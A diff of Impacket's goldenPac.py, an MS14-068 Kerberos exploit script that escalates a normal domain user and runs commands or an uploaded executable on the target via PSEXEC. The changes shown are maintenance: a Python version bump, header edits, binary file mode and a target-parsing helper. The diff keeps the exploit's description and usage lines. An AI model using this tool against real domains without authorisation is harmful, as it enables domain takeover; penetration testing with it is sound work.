@@ -1,34 +1,38 @@
-#!/usr/local/bin/python3.8
-#!/usr/local/bin/python3.8
-# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#!/usr/local/bin/python3.11
+#!/usr/local/bin/python3.11
+# Impacket - Collection of Python classes for working with network protocols.
 #
-# This software is provided under under a slightly modified version
+# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
 # of the Apache Software License. See the accompanying LICENSE file
 # for more information.
 #
-# Author: Alberto Solino (@agsolino)
-#
 # Description:
-#   MS14-068 Exploit. Kudos to @BiDOrD for pulling it up first! 
+#   MS14-068 Exploit. Kudos to @BiDOrD for pulling it up first!
 #   Well done :).
-#   This one also established a SMBConnection and PSEXEcs the 
+#   This one also established a SMBConnection and PSEXEcs the
 #   target.
 #   A few important things:
 #   1) you must use the domain FQDN or use -dc-ip switch
-#   2) target must be a FQDN as well and matching the target's NetBIOS 
+#   2) target must be a FQDN as well and matching the target's NetBIOS
 #   3) Just RC4 at the moment - DONE (aes256 added)
 #   4) It won't work on Kerberos-only Domains (but can be fixed)
 #   5) Use WMIEXEC approach instead
 #
 #   E.G:
-#       /usr/local/bin/python3.8 goldenPac domain.net/normaluser@domain-host
+#       /usr/local/bin/python3.11 goldenPac domain.net/normaluser@domain-host
 #       the password will be asked, or
 #
-#       /usr/local/bin/python3.8 goldenPac.py domain.net/normaluser:mypwd@domain-host
+#       /usr/local/bin/python3.11 goldenPac.py domain.net/normaluser:mypwd@domain-host
 #
 #       if domain.net and/or domain-host do not resolve, add them
 #       to the hosts file or use the -dc-ip and -target-ip parameters
 #
+# Author:
+#   Alberto Solino (@agsolino)
+#
+
 from __future__ import division
 from __future__ import print_function
 import cmd
@@ -54,6 +58,7 @@ from impacket.krb5.pac import PKERB_VALIDATION_INFO, KERB_VALIDATION_INFO, KERB_
     PAC_SIGNATURE_DATA, PAC_INFO_BUFFER, PAC_LOGON_INFO, PAC_CLIENT_INFO_TYPE, PAC_SERVER_CHECKSUM, \
     PAC_PRIVSVR_CHECKSUM, PACTYPE
 from impacket.examples import logger
+from impacket.examples.utils import parse_target
 from impacket.examples import remcomsvc, serviceinstall
 from impacket.smbconnection import SMBConnection, smb
 from impacket.structure import Structure
@@ -122,7 +127,7 @@ class PSEXEC:
                 installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), remcomsvc.RemComSvc())
             else:
                 try:
-                    f = open(self.__exeFile)
+                    f = open(self.__exeFile, 'rb')
                 except Exception as e:
                     logging.critical(str(e))
                     sys.exit(1)
@@ -1094,14 +1099,14 @@ if __name__ == '__main__':
     if len(sys.argv)==1:
         parser.print_help()
         print("\nExamples: ")
-        print("\t/usr/local/bin/python3.8 goldenPac domain.net/normaluser@domain-host\n")
+        print("\t/usr/local/bin/python3.11 goldenPac domain.net/normaluser@domain-host\n")
         print("\tthe password will be asked, or\n")
-        print("\t/usr/local/bin/python3.8 goldenPac.py domain.net/normaluser:mypwd@domain-host\n")
+        print("\t/usr/local/bin/python3.11 goldenPac.py domain.net/normaluser:mypwd@domain-host\n")
         print("\tif domain.net and/or domain-machine do not resolve, add them")
         print("\tto the hosts file or explicitly specify the domain IP (e.g. 1.1.1.1) and target IP:\n")
-        print("\/usr/local/bin/python3.8 goldenPac.py -dc-ip 1.1.1.1 -target-ip 2.2.2.2 domain.net/normaluser:mypwd@domain-host\n")
+        print("\/usr/local/bin/python3.11 goldenPac.py -dc-ip 1.1.1.1 -target-ip 2.2.2.2 domain.net/normaluser:mypwd@domain-host\n")
         print("\tThis will upload the xxx.exe file and execute it as: xxx.exe param1 param2 paramn")
-        print("\/usr/local/bin/python3.8 goldenPac.py -c xxx.exe domain.net/normaluser:mypwd@domain-host param1 param2 paramn\n")
+        print("\/usr/local/bin/python3.11 goldenPac.py -c xxx.exe domain.net/normaluser:mypwd@domain-host param1 param2 paramn\n")
         sys.exit(1)
  
     options = parser.parse_args()
@@ -1109,15 +1114,7 @@ if __name__ == '__main__':
     # Init the example's logger theme
     logger.init(options.ts)
 
-    import re
-
-    domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
-        options.target).groups('')
-
-    #In case the password contains '@'
-    if '@' in address:
-        password = password + '@' + address.rpartition('@')[0]
-        address = address.rpartition('@')[2]
+    domain, username, password, address = parse_target(options.target)
 
     if domain == '':
         logging.critical('Domain should be specified!')
